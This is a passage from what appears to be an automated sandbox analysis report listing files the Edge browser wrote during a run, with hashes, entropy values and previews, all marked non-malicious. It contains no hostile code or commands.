                                                                                                                                                                                                                                                                                                      SHA1:EF47AD97409319AD677B41D1A1F08592CFA0E8F0
                                                                                                                                                                                                                                                                                                      SHA-256:7BD2846A20E80B9FA5B131D94A0A0620B85E58DAFA458E23C7F214BD4AF7A11C
                                                                                                                                                                                                                                                                                                      SHA-512:176931CBFD09EE0B064E2A737CE5AE327D0FBD5D601C30EAD708B5DB56EF478ED9C5069CDDE15C44ED74348C42B8FF42298F3C9A4E8915AFFF0CA9A0B7E05CBE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:............wix....`.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                                      MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                                      SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                                      SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                                                      SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ea6ca8fe-7753-4d5f-a550-e7b0f4fd497b.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9080
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.093944443384687
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st+SGSs+PGyaNPmk8Z3388bV+FiA9WT1P5YJ:st+AseGtJKFbGiOv
                                                                                                                                                                                                                                                                                                      MD5:06751022EF83EEC93154A4A8276D5ADE
                                                                                                                                                                                                                                                                                                      SHA1:D5ACF9666E9A7B418F685FD393F5AE393E022352
                                                                                                                                                                                                                                                                                                      SHA-256:91902D0330DFE367C37275B964285ABC7C11CE92BFABDC3F40E7C3415D491767
                                                                                                                                                                                                                                                                                                      SHA-512:9BEDC1EA63F2F1B1FEC387D0CC7436EEB4FE7EB59278F6E0DA2EFFD020578C2921DE2F418EE91A8D2E12F465A74DDE349F0E27E7D29AD32BBB6BDA345D316F48
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326091766617","domain_dive

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ef62233d-1d2b-4e94-af60-18626643247d.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.568002904992919
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:hljEO0WP1hfmB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVK/muG6trwyp1Xtus:hljEO0WP1hfmBu1ja/DfW8Xtv
                                                                                                                                                                                                                                                                                                      MD5:6DAB24C7E4A147D4FBCC126D5A8F38EC
                                                                                                                                                                                                                                                                                                      SHA1:BF2AD2B6FCBF15325FD64149E5EC83B9BDAB2DD0
                                                                                                                                                                                                                                                                                                      SHA-256:F7094985130E1F782F64FDAA3ED5C204F8597E75444CD22322AC5FA5A1A97BB6
                                                                                                                                                                                                                                                                                                      SHA-512:DA641EAC48E26BCA92103095899B4CCDD5690B683CE8CFA06B5B7B39A872EDE8F2B88A99EB75A5D182743EAF5ADD226049AA502D61D3467F970A4FFF35419010
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326091490196","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326091490196","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.061024370125446294
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:Gy0EMAb0EMAxT89XCChslotGLNl0ml/Vl/Vl/U8oQXmlXCUWls:CEzAEzVspEjVl/PnvoQW1
                                                                                                                                                                                                                                                                                                      MD5:CF4873B2A525D6553230152BF90ACCD9
                                                                                                                                                                                                                                                                                                      SHA1:BDB8D8291F8806F83699F4D299C55915157EA54F
                                                                                                                                                                                                                                                                                                      SHA-256:9F4B4280C6D2C3E92C7789800523A999EDEBA20456D232C1001CDBDE62A93453
                                                                                                                                                                                                                                                                                                      SHA-512:3369D7B1904A151C826226F239FFB9CA2D37FB909257C4B612F84D34A174F90443FE482971731B61BFA4E7E9A59126511F053720B633BDB9D433E862DE43183E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..-...........................!3.-.....0.!....D..-...........................!3.-.....0.!....D........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):119512
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.7434828240943061
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:RzxwkllO+HcbX+7n9VAKAFXX+MIK6qT2VAKAFXX++xOqVAKAFXX+T/nUYVAKAFXn:lx9ZBwNsFlsNsMO5NsaNsM2gfzh1P
                                                                                                                                                                                                                                                                                                      MD5:8E2668A947B1D7A4B016CB380C0C858D
                                                                                                                                                                                                                                                                                                      SHA1:C5DB76E363FFEBE476D803658F82AA6B49D4894A
                                                                                                                                                                                                                                                                                                      SHA-256:91EA03A3EDDB76A82FC23F082412B1212D3787E8EDF9F78A2501229FDC800E64
                                                                                                                                                                                                                                                                                                      SHA-512:A112277BA94561B1ACC70396AD19A1A186A10B4F4B79E34F98E5DB55CE0F8405E990212F747DF612930183BB35EDC192EAD2521BE5054D00AB57F2B8868647C4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4288
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.024233299875724
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:DKPsmy9nsmyvAYqpRJsmyvqVqm4smyvqVqmw7:Gny9fyotybyz
                                                                                                                                                                                                                                                                                                      MD5:C268CED7A1CCD16A1E83717DC8E39AF4
                                                                                                                                                                                                                                                                                                      SHA1:9B287A52FC10B06DB080DC3A959C235069C4ACB9
                                                                                                                                                                                                                                                                                                      SHA-256:D3F2E3A66B23AF534EEA28256279163417765F9694B0AC645930D1F42145ECCE
                                                                                                                                                                                                                                                                                                      SHA-512:59398CD5D0FD9868DEE2BCC1DD0040A3982A20ED6B4E21C129722DDD0342013B627EB0D65A609F0E0546131DD0ACEE1C209B9A2EF08FE7C304AA0E15DFC5178C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................................021_download,186c92cb-83e5-4aac-89bf-128ae25009e7......$186c92cb-83e5-4aac-89bf-128ae25009e7................"...nhttps://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1...https://uc7569213660364555d096b4af3d.dl.dropboxusercontent.com/cd/0/get/CgBrJd1x-qTfcYXPFE412Lis9q-HoFjumzxgzf722Qj69a3uFoFqnlbsZRkn8vQ_nLbyvaG5NlGdxNb0UjoSKS71nM_-VEJfe_G56No2MUYUk95bQqHXVH1-Bg1JW2zoiYuYNgDINgW4MUaIg2fzF5vd/file?dl=1#.."nhttps://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1*.0.B.1733686441286063dJ.P...Z.application/binaryb.application/binaryj.........r.........x.......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.165648237754487
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7O+q2PcNwi23oH+TcwtfrK+IFUt8O0Zmw+OUVkwOcNwi23oH+TcwtfrUeLJ:7O+vLZYeb23FUt8O0/+OUV54ZYeb3J
                                                                                                                                                                                                                                                                                                      MD5:721E1C001C03D455A0259319CC80652A
                                                                                                                                                                                                                                                                                                      SHA1:BEDD120B6F2168D5031E906B5E940A83537A9EAA
                                                                                                                                                                                                                                                                                                      SHA-256:5475696A91E1D30CAF69723FE2F76046A8E367E114B08FB9F683A6B94F10BC93
                                                                                                                                                                                                                                                                                                      SHA-512:2C86BD0A3271FCE689D9FA5AB3DB66D1C7DFAB772D6CE212C450E1D8EB447B0992D452EDD7A5E229505C95C6AF81CCEFD3DCE825BE815C5266230ADD6933F982
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:32.290 182c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/10-12:41:32.292 182c Recovering log #3.2024/12/10-12:41:32.292 182c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.165648237754487
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7O+q2PcNwi23oH+TcwtfrK+IFUt8O0Zmw+OUVkwOcNwi23oH+TcwtfrUeLJ:7O+vLZYeb23FUt8O0/+OUV54ZYeb3J
                                                                                                                                                                                                                                                                                                      MD5:721E1C001C03D455A0259319CC80652A
                                                                                                                                                                                                                                                                                                      SHA1:BEDD120B6F2168D5031E906B5E940A83537A9EAA
                                                                                                                                                                                                                                                                                                      SHA-256:5475696A91E1D30CAF69723FE2F76046A8E367E114B08FB9F683A6B94F10BC93
                                                                                                                                                                                                                                                                                                      SHA-512:2C86BD0A3271FCE689D9FA5AB3DB66D1C7DFAB772D6CE212C450E1D8EB447B0992D452EDD7A5E229505C95C6AF81CCEFD3DCE825BE815C5266230ADD6933F982
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:32.290 182c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/10-12:41:32.292 182c Recovering log #3.2024/12/10-12:41:32.292 182c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):782
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                                      MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                                      SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                                      SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                                      SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):348
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.17997775826998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7eN+q2PcNwi23oH+TcwtfrzAdIFUt8OPZmw+OvVkwOcNwi23oH+TcwtfrzILJ:7eN+vLZYeb9FUt8OP/+OvV54ZYeb2J
                                                                                                                                                                                                                                                                                                      MD5:64868BA21536365D9905C1E8C13AC77C
                                                                                                                                                                                                                                                                                                      SHA1:A84637B779E553DB7F895B2A52EE7622FB81C533
                                                                                                                                                                                                                                                                                                      SHA-256:462EEFEC5B894550A620620A7FC945547F46B6240D0DB36875A24583334A3BC3
                                                                                                                                                                                                                                                                                                      SHA-512:023EBA0E708685C9C3B15C48B95DB1BE9E043D85D55FA8F94DB43BCF970F8A378405EFF6ABBCD946964EF7CEEEC777418002DC546B06682FCE9DD8863148C789
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:32.229 182c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/10-12:41:32.248 182c Recovering log #3.2024/12/10-12:41:32.275 182c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):348
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.17997775826998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7eN+q2PcNwi23oH+TcwtfrzAdIFUt8OPZmw+OvVkwOcNwi23oH+TcwtfrzILJ:7eN+vLZYeb9FUt8OP/+OvV54ZYeb2J
                                                                                                                                                                                                                                                                                                      MD5:64868BA21536365D9905C1E8C13AC77C
                                                                                                                                                                                                                                                                                                      SHA1:A84637B779E553DB7F895B2A52EE7622FB81C533
                                                                                                                                                                                                                                                                                                      SHA-256:462EEFEC5B894550A620620A7FC945547F46B6240D0DB36875A24583334A3BC3
                                                                                                                                                                                                                                                                                                      SHA-512:023EBA0E708685C9C3B15C48B95DB1BE9E043D85D55FA8F94DB43BCF970F8A378405EFF6ABBCD946964EF7CEEEC777418002DC546B06682FCE9DD8863148C789
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:32.229 182c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/10-12:41:32.248 182c Recovering log #3.2024/12/10-12:41:32.275 182c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                      MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                      SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                      SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                      SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
